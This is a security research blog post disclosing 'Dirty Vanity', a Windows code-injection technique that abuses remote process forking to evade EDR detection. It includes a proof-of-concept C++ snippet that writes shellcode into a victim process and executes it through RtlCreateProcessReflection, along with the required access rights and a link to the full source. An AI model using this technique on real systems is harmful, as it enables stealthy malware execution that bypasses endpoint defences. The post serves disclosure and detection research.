APRIL 12, 2023

Dirty Vanity: A New Approach to Code Injection & EDR Bypass

Dirty Vanity is a new code-injection technique that abuses forking, a lesser-known mechanism that exists in Windows operating systems. In this post, we will dive deep into forking, explore its legitimate use, and show how it can be manipulated into blindsiding EDRs by injecting malicious code.

Implementing a new code-injection technique normally follows a simple formula, which makes defending against these attacks manageable. Occasionally, a new eccentric technique is introduced that cannot be mitigated by the normal protocol. Case in point: Dirty Vanity.

Forking Background

Forking a process is the act of creating a new process from the calling process. The name “fork” originates from the UNIX system calls of process creation – ‘fork’ and ‘exec.’

Dirty Vanity is an abuse of the legitimate forking mechanism that exists in Windows.

The Windows Fork

Windows itself doesn’t make use of fork and exec for process creation. However, it did support them through its legacy POSIX subsystem (included since the first edition of Windows NT in 1993), which was meant to support basic UNIX binary execution. The POSIX subsystem has long been replaced (first by Windows Services for UNIX (SFU) in Windows XP, and later by the current Windows Subsystem for Linux (WSL)), yet its code still affects Windows to this day.

Below is a look at psxdll.dll, a DLL that was a core part of this subsystem and exported basic UNIX APIs:

Figure 1: Fork Origins

As we can see, _fork is internally implemented with a call to ntdll's RtlCloneUserProcess, which does the actual forking.

The example above shows the origin of the Windows fork. The following mechanisms still use forking to this day:

Process Reflection - a forking mechanism whose goal is to allow analysis on processes that should continuously provide service. WDI (Windows Diagnostics Infrastructure) uses Process Reflection to do just this:

Figure 2: Process Reflection

Process Snapshotting - enables you to capture process state, in part or whole. It can efficiently capture the virtual address contents of a process using the Windows internal POSIX fork clone capability.

A malicious use case example:
Credential Dumping via forking - In the credential dumping realm, many defenses are focused on LSASS.exe, which stores the credentials of logged-on users. There is a forking bypass for those defenses that utilizes one of the previously mentioned forking mechanisms to fork LSASS and access the less protected contents of the fork:

Figure 3: Credential Dumping via Forking

In summary, Windows contains a forking capability that resembles the traditional UNIX fork it originally aimed to support, yet it also exposes a different and more powerful option: the remote fork. With remote forking, defenses can be manipulated, as seen in the malicious LSASS dumping use case above. With Dirty Vanity, we will demonstrate how it can be abused further.

Forking API

Before presenting how Dirty Vanity abuses remote forking, we will cover the Windows API that can invoke a fork. We begin with the API supporting the POSIX base fork:

RtlCloneUserProcess(  
ULONG ProcessFlags,
PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
HANDLE DebugPort,
PRTL_USER_PROCESS_INFORMATION ProcessInformation);

RtlCloneUserProcess is essentially a wrapper around NtCreateUserProcess, invoking the same ability:

NtCreateUserProcess(
PHANDLE ProcessHandle,
PHANDLE ThreadHandle,
ACCESS_MASK ProcessDesiredAccess,
ACCESS_MASK ThreadDesiredAccess,
POBJECT_ATTRIBUTES ProcessObjectAttributes,
POBJECT_ATTRIBUTES ThreadObjectAttributes,
ULONG ProcessFlags,
ULONG ThreadFlags,
PVOID ProcessParameters,
PPS_CREATE_INFO CreateInfo,
PPS_ATTRIBUTE_LIST AttributeList);

NtCreateUserProcess is a system call. It exposes process forking by setting the PS_ATTRIBUTE_PARENT_PROCESS attribute within the PPS_ATTRIBUTE_LIST AttributeList parameter, as presented below:

NTSTATUS NtForkUserProcess()
{
HANDLE hProcess = nullptr, hThread = nullptr;
OBJECT_ATTRIBUTES poa = { sizeof(poa) };
OBJECT_ATTRIBUTES toa = { sizeof(toa) };
PS_CREATE_INFO createInfo = {sizeof(createInfo)};
createInfo.State = PsCreateInitialState;
// Add a parent handle in attribute list
PPS_ATTRIBUTE_LIST attributeList;
PPS_ATTRIBUTE attribute;
UCHAR attributeListBuffer[FIELD_OFFSET(PS_ATTRIBUTE_LIST, Attributes) + sizeof(PS_ATTRIBUTE) * 1];
memset(attributeListBuffer, 0, sizeof(attributeListBuffer));
attributeList = reinterpret_cast<PPS_ATTRIBUTE_LIST>(attributeListBuffer);
attributeList->TotalLength = FIELD_OFFSET(PS_ATTRIBUTE_LIST, Attributes) + sizeof(PS_ATTRIBUTE) * 1;
attribute = &attributeList->Attributes[0];
attribute->Attribute = PS_ATTRIBUTE_PARENT_PROCESS;
attribute->Size = sizeof(HANDLE);
attribute->ValuePtr = GetCurrentProcess();

NtCreateUserProcessFunc const NtCreateUserProcess = reinterpret_cast<NtCreateUserProcessFunc>(GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateUserProcess"));
NTSTATUS res = NtCreateUserProcess(&hProcess, &hThread, 0, 0, nullptr, nullptr, PROCESS_CREATE_FLAGS_INHERIT_FROM_PARENT | PROCESS_CREATE_FLAGS_INHERIT_HANDLES, THREAD_CREATE_FLAGS_CREATE_SUSPENDED, nullptr, &createInfo, attributeList);
auto pid = GetProcessId(hProcess);
return res;
}

As we concluded, the more powerful variant of fork in Windows is the remote fork. Yet if we try to replace attribute->ValuePtr = GetCurrentProcess(); in this example with a different handle, attribute->ValuePtr = someOtherHandle;, the call fails with STATUS_INVALID_PARAMETER (0xC000000D), meaning this API is not capable of remote forking.
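For readers who do not read NTSTATUS values every day, the sketch below decodes the value quoted above. It assumes the standard NTSTATUS bit layout (severity in the top two bits, facility in bits 16 to 27, code in the low 16 bits) and mirrors the logic of the NT_SUCCESS macro. The helper names are ours, and the type is redefined locally so the snippet compiles without the Windows SDK.

```cpp
#include <cassert>
#include <cstdint>

// Local stand-in for the SDK typedef (assumption: 32-bit signed, as in ntdef.h).
using NTSTATUS = std::int32_t;

// The value reported in the text for the failed remote-fork attempt.
constexpr NTSTATUS STATUS_INVALID_PARAMETER = static_cast<NTSTATUS>(0xC000000D);

// Same test as the NT_SUCCESS macro: non-negative values mean success or informational.
constexpr bool nt_success(NTSTATUS s) { return s >= 0; }

// Hypothetical helper names; the bit positions follow the documented NTSTATUS layout.
constexpr unsigned severity(NTSTATUS s) { return static_cast<std::uint32_t>(s) >> 30; }
constexpr unsigned facility(NTSTATUS s) { return (static_cast<std::uint32_t>(s) >> 16) & 0xFFF; }
constexpr unsigned status_code(NTSTATUS s) { return static_cast<std::uint32_t>(s) & 0xFFFF; }
```

Severity 3 is the "error" class, which is why the call in the example above must be treated as a hard failure rather than a warning.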

Remote Forking

We will now explore the API behind Process Reflection & Process Snapshotting, as these are the mechanisms that provide remote forking in Windows.

Process Snapshotting is invoked with Kernel32!PssCaptureSnapshot. Going down the call chain, Kernel32!PssCaptureSnapshot calls ntdll!PssNtCaptureSnapshot, which in turn calls ntdll!NtCreateProcessEx.

Let’s take a look at NtCreateProcessEx and its legacy version, NtCreateProcess:

NtCreateProcessEx(
PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
HANDLE ParentProcess,
ULONG Flags,
HANDLE SectionHandle,
HANDLE DebugPort,
HANDLE ExceptionPort,
BOOLEAN InJob);

NtCreateProcess(
PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
HANDLE ParentProcess,
BOOLEAN InheritObjectTable,
HANDLE SectionHandle,
HANDLE DebugPort,
HANDLE ExceptionPort);

NtCreateProcess[Ex] are two legacy process creation syscalls that offer another route to the forking mechanism. However, as opposed to the newer NtCreateUserProcess, they can fork a remote process: set the HANDLE ParentProcess parameter to the target process handle.

Process Reflection is invoked with RtlCreateProcessReflection:

RtlCreateProcessReflection(
HANDLE ProcessHandle,
ULONG Flags,
PVOID StartRoutine,
PVOID StartContext,
HANDLE EventHandle,
T_RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION* ReflectionInformation);

RtlCreateProcessReflection will fork the process represented by HANDLE ProcessHandle.

It performs the following actions:

  1. Creates a shared memory section.
  2. Populates the shared memory section with parameters.
  3. Maps the shared memory section into the current and target processes.
  4. Creates a thread on the target process via a call to RtlpCreateUserThreadEx. The thread is directed to begin execution in ntdll’s RtlpProcessReflectionStartup function.
  5. The created thread calls RtlCloneUserProcess, passing the parameters it obtains from the memory mapping it shares with the initiating process. As mentioned before, RtlCloneUserProcess wraps NtCreateUserProcess, which forks the current process into a new one.
  6. In kernel mode, NtCreateUserProcess executes most of the same code paths as when it creates a new process, with the exception that PspAllocateProcess, which it calls to create the process object and initial thread, calls MmInitializeProcessAddressSpace with a flag specifying that the address space should be a copy-on-write copy of the target process instead of an initial process address space.
  7. If the caller of RtlCreateProcessReflection specified a PVOID StartRoutine, RtlpProcessReflectionStartup will transfer execution to it prior to closing. It will also provide PVOID StartContext as an argument if supplied.

As you’ve probably guessed, PVOID StartRoutine plays a key role in Dirty Vanity.

Most of the forking heavy lifting is done in kernel mode, and one of the most interesting parts is that it copies all the target process address space to the forked process, including dynamic allocations and runtime modifications, which brings us to Dirty Vanity.
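The "copy of everything, including runtime modifications" property is easiest to see with the classic UNIX fork that the Windows mechanism descends from. The sketch below is a POSIX analogy only (it uses fork and waitpid, not any Windows API), and the struct and function names are ours. It checks two things: the child finds a heap buffer that was written before the fork, and the child's later write does not leak back into the parent, which is the copy-on-write behavior described above.

```cpp
#include <cassert>
#include <cstring>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

struct ForkObservation {
    bool child_saw_runtime_data;  // child found the bytes written before the fork
    bool parent_copy_untouched;   // child's own write stayed private to the child
};

ForkObservation observe_fork_copy() {
    // A dynamic allocation, modified at run time before forking.
    char* buffer = new char[16];
    std::strcpy(buffer, "before-fork");

    pid_t pid = fork();
    if (pid < 0) {                 // fork failed: report nothing observed
        delete[] buffer;
        return {false, false};
    }
    if (pid == 0) {
        // Child: same virtual address, same contents as the parent had.
        bool saw = std::strcmp(buffer, "before-fork") == 0;
        std::strcpy(buffer, "child-write");  // lands in the child's private copy
        _exit(saw ? 0 : 1);
    }

    // Parent: collect the child's verdict, then inspect our own copy.
    int status = 0;
    waitpid(pid, &status, 0);
    bool saw = WIFEXITED(status) && WEXITSTATUS(status) == 0;
    bool untouched = std::strcmp(buffer, "before-fork") == 0;
    delete[] buffer;
    return {saw, untouched};
}
```

The Windows remote fork differs in who initiates the clone, but the address-space semantics sketched here are the part that matters for the rest of this post.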

Dirty Vanity Set Up

Code Injection and Endpoint Detection and Response (EDR)

Let's briefly cover the steps of a traditional injection.

To get injected code up and running in a target process, an injector will do the following:

  • STEP 1: Allocate space for the shellcode to inject or find a code cave for it.
  • STEP 2: Write the shellcode to the space created in STEP 1 using various write primitives.
    • WriteProcessMemory
    • NtMapViewOfSection
    • GlobalAddAtom
  • STEP 3: Execute the written shellcode from STEP 2 using various execution primitives.
    • NtSetContextThread
    • NtQueueApcThread
    • IAT Hook & invoking the hook

An injector can choose any Allocate, Write, and Execute primitive combination, invoke them, and create an injection.

Due to the dynamic nature of injection primitives, most EDRs will attempt to deal with injections by hooking all the primitives they are aware of. The following is an example of this approach where Injector.exe is performing the simplest injection on Explorer.exe:

Figure 4: Simple Injection on Explorer.exe

When an EDR monitors the system, it watches for all primitives used against the same target and catches all three on Explorer.exe:

  • Allocation = VirtualAllocEx
  • Write content to the allocation = WriteProcessMemory
  • Execution of the written content = CreateRemoteThread

When the final execution primitive is observed, the EDR will detect or block the injection attempt.
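To make the correlation idea concrete, here is a deliberately simplified model of it. This is not how any particular EDR is implemented; the class and enum names are hypothetical, and real products track far more context. The sketch only captures the rule described above: an alert fires once Allocate, Write, and Execute have all been observed against the same target PID.

```cpp
#include <cassert>
#include <cstdint>
#include <unordered_map>

// One bit per primitive class so they can be accumulated in a mask.
enum class Primitive : std::uint8_t { Allocate = 1, Write = 2, Execute = 4 };

// Hypothetical per-target correlator (illustrative model only).
class NaiveCorrelator {
public:
    // Records one primitive seen against target_pid.
    // Returns true once all three classes were seen on that same PID.
    bool observe(std::uint32_t target_pid, Primitive p) {
        std::uint8_t& seen = seen_[target_pid];
        seen |= static_cast<std::uint8_t>(p);
        return seen == kAll;
    }

private:
    static constexpr std::uint8_t kAll = 7;  // Allocate | Write | Execute
    std::unordered_map<std::uint32_t, std::uint8_t> seen_;
};
```

Note that the state is keyed by PID: an Execute observed on a PID with no recorded Allocate or Write does not complete the pattern.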

Dirty Vanity in Action

Dirty Vanity abuses the previously described remote forking mechanism in Windows as a new primitive in the injection realm - Fork. The concept behind it is simple, and it consists of the following steps:

  1. Initial Write Step: allocate and write your payload to a target process in whatever way preferred, e.g.:
    1. VirtualAllocEx & WriteProcessMemory
    2. NtCreateSection & NtMapViewOfSection
    3. Any other preferred way
  2. Fork & Execute Step: perform a remote fork on the target process, and set the process start address to the payload (which gets forked to the same location), with:
    1. RtlCreateProcessReflection (PVOID StartRoutine = points to cloned shellcode)
    2. NtCreateProcess[Ex] + any execute primitive on the cloned shellcode

Let’s apply these steps to our previous example:

Figure 5: Dirty Vanity Flow

Injector.exe starts things normally with VirtualAllocEx followed by WriteProcessMemory over Explorer.exe. An EDR monitoring this system correlates those operations and waits for a third execution primitive to mark this operation as an Injection.

In Dirty Vanity, this anticipated execution primitive never happens; instead, we turn to a remote fork API.

Explorer.exe is now forked, and the resulting process contains a copy of the Explorer.exe address space, including the payload from the Initial Write Step, loaded at the same address with the same memory protection.

By setting the forked process's start address to our payload, we get it to execute. This can be done with:

  1. RtlCreateProcessReflection(PVOID StartRoutine = points to cloned shellcode)
  2. NtCreateProcess[Ex] + a follow up execute primitive on the cloned shellcode

After these steps are completed our forked Explorer.exe contains our payload and executes it.

The novelty behind Dirty Vanity is the separation that the fork creates: the allocate and write stages are performed normally on the target process, but they won’t get caught, because the actual execution stage (critical to seal the deal as an injection from the EDR's perspective) is performed by and on the forked process.

From the EDR's point of view, the new forked Explorer.exe was never written to, and an execution on it does not correlate with a write attempt.

Due to this unique execution, Dirty Vanity slips past common EDR detection methods.

Prerequisites to run Dirty Vanity

In order to invoke Dirty Vanity we need a target process handle with the following access rights:

  • RtlCreateProcessReflection variant: PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE
  • NtCreateProcess[Ex] variant: PROCESS_CREATE_PROCESS

For a complete implementation, the target process handle should contain a combination of these access rights and the ones fitting for your choice of Initial Write Step.
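From the defender's side, these requirements are useful for triage: a handle whose granted access does not cover one of the two sets above cannot be used for that variant. The sketch below shows the mask check. The numeric values match the PROCESS_* definitions in the Windows SDK, redefined here under our own names so the snippet compiles anywhere; the helper functions are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// Values as defined for the PROCESS_* access rights in the Windows SDK.
constexpr std::uint32_t kProcessCreateThread  = 0x0002;
constexpr std::uint32_t kProcessVmOperation   = 0x0008;
constexpr std::uint32_t kProcessVmWrite       = 0x0020;
constexpr std::uint32_t kProcessDupHandle     = 0x0040;
constexpr std::uint32_t kProcessCreateProcess = 0x0080;

// Rights the text lists for each remote-fork variant.
constexpr std::uint32_t kReflectionRights =
    kProcessVmOperation | kProcessCreateThread | kProcessDupHandle;
constexpr std::uint32_t kLegacyForkRights = kProcessCreateProcess;

// True when every bit in `required` is present in `granted`.
constexpr bool grants_all(std::uint32_t granted, std::uint32_t required) {
    return (granted & required) == required;
}

// Hypothetical triage helpers for a handle-open event.
constexpr bool allows_reflection_fork(std::uint32_t granted) {
    return grants_all(granted, kReflectionRights);
}
constexpr bool allows_legacy_fork(std::uint32_t granted) {
    return grants_all(granted, kLegacyForkRights);
}
```

For example, a handle granted PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE (0x6A) satisfies the reflection variant but not the NtCreateProcess[Ex] variant.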

Dirty Vanity via RtlCreateProcessReflection

The research behind this blog was focused on a POC with the RtlCreateProcessReflection approach.

Here is a code snippet performing Dirty Vanity with it:

unsigned char shellcode[] = {0x40, 0x55, 0x57, ...};
size_t bytesWritten = 0;

// Opening the fork target with the appropriate rights
HANDLE victimHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, TRUE, victimPid);

// Allocate shellcode size within the target
DWORD_PTR shellcodeSize = sizeof(shellcode);
LPVOID baseAddress = VirtualAllocEx(victimHandle, nullptr, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

// Write the shellcode
BOOL status = WriteProcessMemory(victimHandle, baseAddress, shellcode, shellcodeSize, &bytesWritten);
#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
HMODULE ntlib = LoadLibraryA("ntdll.dll");
Rtl_CreateProcessReflection RtlCreateProcessReflection = (Rtl_CreateProcessReflection)GetProcAddress(ntlib, "RtlCreateProcessReflection");
T_RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION info = { 0 };

// Fork target & Execute shellcode base within clone
NTSTATUS ret = RtlCreateProcessReflection(victimHandle, RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES, baseAddress, NULL, NULL, &info);

When first attempting this POC, we used a basic MessageBoxA shellcode, which resulted in an access violation exception:

1:002> g
(6738.da4): Access violation - code c0000005 (first chance)
First-chance exceptions are reported before any exception handling.
This exception may be expected and handled.
USER32!GetDpiForCurrentProcess+0x14:
00007ff8`8b75719c 0fb798661b0000 movzx ebx,word ptr [rax+1B66h] ds:000002d3`6ef92ba6=????
1:002> k
# Child-SP RetAddr Call Site
00 000000da`df9ffb10 00007ff8`8b7570c2 USER32!GetDpiForCurrentProcess+0x14
01 000000da`df9ffb40 00007ff8`8b75703b USER32!ValidateDpiAwarenessContextEx+0x32
02 000000da`df9ffb70 00007ff8`8b7bc2da USER32!SetThreadDpiAwarenessContext+0x4b
03 000000da`df9ffba0 00007ff8`8b7bc0d8 USER32!MessageBoxTimeoutW+0x19a
04 000000da`df9ffca0 00007ff8`8b7bbcee USER32!MessageBoxTimeoutA+0x108
05 000000da`df9ffd00 000002d3`71bf0050 USER32!MessageBoxA+0x4e
06 000000da`df9ffd40 00007ff8`8c210000 0x000002d3`71bf0050

The shellcode was effectively forked and executed, yet the internals of USER32!MessageBoxA failed to operate from within the fork.

In short, USER32!MessageBoxA needs the user32!gSharedInfo structure to be mapped to the process.

Our forked process is lacking it because user32!gSharedInfo is explicitly mapped to each process with the ViewUnmap setting:

“ViewUnmap: The view will not be mapped into child processes” - MSDN

This means that ViewUnmap data (like user32!gSharedInfo) is not inherited by cloned child processes. To overcome this obstacle, our POC uses an NTDLL-only shellcode, which is completely standalone and therefore has no dependency on such sections.

We used https://github.com/rainerzufalldererste/windows_x64_shellcode_template as a template to create a custom ntdll-based shellcode that performs:

  1. Detection of Ntdll API from the LDR
  2. Parameter creation with RtlInitUnicodeString & RtlAllocateHeap & RtlCreateProcessParametersEx
  3. Invocation of NtCreateUserProcess
    1. process: C:\Windows\System32\cmd.exe
    2. Command line: /k msg * “Hello from Dirty Vanity”

For the full source code: https://github.com/deepinstinct/Dirty-Vanity

Wrapping it together:

Figure 6: Dirty Vanity invoked over Explorer’s PID

Figure 7: The result process tree, with the forked Explorer child executing our shellcode.

Summary

To detect code injections, EDR solutions traditionally monitor and correlate ‘Allocate / Write / Execute’ operations that are performed on the same process. The fork API introduces a new injection primitive, Fork, that challenges the traditional detection approach.

Dirty Vanity makes use of forking to clone any Allocate and Write efforts to a new process. From the EDR perspective this process was never written to – and thus won't be flagged as injected – when eventually executed by:

  • Fork & Execute with RtlCreateProcessReflection, which is the focus of this research.
  • Ordinary Execute primitives after a call to RtlCreateProcessReflection or NtCreateProcess[Ex], which is still an unexplored path.

Dirty Vanity changes how we look at injection defense because forking changes the rules of OS monitoring. EDRs must respond by monitoring all the forking primitives presented, tracking forked processes, and treating them with the same knowledge they hold about their parents.
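One way to picture "treating a fork with the knowledge held about its parent" is a correlator that copies the parent's observed history onto the child whenever a fork event is seen. The sketch below is a toy model under that assumption; the class, method, and enum names are hypothetical and it is not a description of any shipping product.

```cpp
#include <cassert>
#include <cstdint>
#include <unordered_map>

// One bit per primitive class so they can be accumulated in a mask.
enum class Primitive : std::uint8_t { Allocate = 1, Write = 2, Execute = 4 };

// Hypothetical correlator that lets forked processes inherit their parent's history.
class ForkAwareCorrelator {
public:
    // Records a primitive against pid; true once Allocate, Write and Execute are all present.
    bool observe(std::uint32_t pid, Primitive p) {
        std::uint8_t& seen = seen_[pid];
        seen |= static_cast<std::uint8_t>(p);
        return seen == kAll;
    }

    // On a fork event, the child starts with everything already seen on the parent.
    void observe_fork(std::uint32_t parent_pid, std::uint32_t child_pid) {
        const std::uint8_t inherited = seen_[parent_pid];
        seen_[child_pid] |= inherited;
    }

private:
    static constexpr std::uint8_t kAll = 7;  // Allocate | Write | Execute
    std::unordered_map<std::uint32_t, std::uint8_t> seen_;
};
```

With this inheritance in place, an Execute on the forked process completes the pattern that began with the Allocate and Write on its parent, while an Execute on an unrelated process still does not.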

For additional details behind this case, and more about the research process check out the Black Hat presentation by the Deep Instinct Research team here: https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf

References

  1. https://github.com/deepinstinct/Dirty-Vanity
  2. https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf
  3. https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/ talking about forking locally with RtlCloneUserProcess & NtCreateUserProcess
  4. https://gist.github.com/juntalis/4366916 & https://gist.github.com/Cr4sh/126d844c28a7fbfd25c6 RtlCloneUserProcess usage, and useful constants
  5. https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c Credential dumping use case using RtlCreateProcessReflection; its reflection code is taken from the next link
  6. https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp RtlCreateProcessReflection source code framework
  7. https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ PssCaptureSnapshot → NtCreateProcessEx
  8. Windows Internals, 7th Edition, Part 1, on RtlCreateProcessReflection
  9. https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2011/BH_US_11_Mandt_win32k_Slides.pdf
  10. https://www.youtube.com/watch?v=EkGDSqpfzgg
  11. https://github.com/rainerzufalldererste/windows_x64_shellcode_template